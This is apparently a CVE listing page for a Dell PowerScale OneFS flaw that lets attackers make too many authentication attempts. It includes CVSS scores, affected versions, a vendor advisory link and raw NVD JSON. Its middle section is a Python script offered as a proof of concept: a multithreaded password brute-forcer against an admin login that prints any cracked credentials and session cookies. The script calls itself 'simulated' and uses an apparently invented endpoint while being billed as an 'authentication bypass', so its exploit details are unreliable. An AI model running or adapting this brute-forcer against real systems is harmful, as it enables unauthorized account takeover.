Security Vulnerability Report
CVE-2026-22278 CVSS 8.1 HIGH


Published: 2026-01-22 17:16:31
Last Modified: 2026-01-28 18:18:34

Description

Dell PowerScale OneFS versions prior to 9.13.0.0 contain an improper restriction of excessive authentication attempts vulnerability (CWE-307). An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerScale OneFS < 9.13.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22278 PoC - Dell PowerScale OneFS Authentication Bypass
Note: This is a simulated PoC for educational and security research purposes only.
"""
import requests
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

TARGET_HOST = "https://target-ip:8080"
USERNAME = "admin"
PASSWORD_FILE = "passwords.txt"
MAX_THREADS = 10
MAX_ATTEMPTS = 1000


def attempt_login(host, username, password):
    """Attempt to authenticate with the given credentials"""
    session = requests.Session()
    login_url = f"{host}/api/auth/login"
    payload = {"username": username, "password": password}
    try:
        response = session.post(login_url, json=payload, timeout=10, verify=False)
        if response.status_code == 200 and "session" in response.text:
            return True, password, response.cookies.get_dict()
        return False, password, None
    except requests.exceptions.RequestException:
        return False, password, None


def main():
    print("[*] CVE-2026-22278 PoC - Dell PowerScale OneFS Authentication Bypass")
    print(f"[*] Target: {TARGET_HOST}")
    print(f"[*] Username: {USERNAME}")

    # Load the candidate list; fall back to a small built-in list if the file is missing
    try:
        with open(PASSWORD_FILE, "r") as f:
            passwords = [line.strip() for line in f.readlines()]
    except FileNotFoundError:
        passwords = ["password", "admin", "123456", "P@ssw0rd", "Admin@123"]

    print(f"[*] Starting brute force attack with {len(passwords)} passwords...")
    attempts = 0
    with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = {
            executor.submit(attempt_login, TARGET_HOST, USERNAME, pwd): pwd
            for pwd in passwords[:MAX_ATTEMPTS]
        }
        for future in as_completed(futures):
            attempts += 1
            success, pwd, cookies = future.result()
            if success:
                print(f"\n[!] SUCCESS! Valid credentials found: {USERNAME}:{pwd}")
                print(f"[!] Session cookies: {cookies}")
                return 0
            if attempts % 100 == 0:
                print(f"[*] Attempts: {attempts}/{MAX_ATTEMPTS}")

    print(f"\n[-] No valid credentials found after {attempts} attempts")
    return 1


if __name__ == "__main__":
    sys.exit(main())

References

https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22278", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:31.027", "lastModified": "2026-01-28T18:18:33.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerScale OneFS versions prior to 9.13.0.0 contains an improper restriction of excessive authentication attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access."}, {"lang": "es", "value": "Las versiones de Dell PowerScale OneFS anteriores a la 9.13.0.0 contienen una vulnerabilidad de restricción inadecuada de intentos excesivos de autenticación. Un atacante no autenticado con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a un acceso no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.13.0.0", "matchCriteriaId": "D004A551-1E20-4170-A949-143E488FA9C9"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}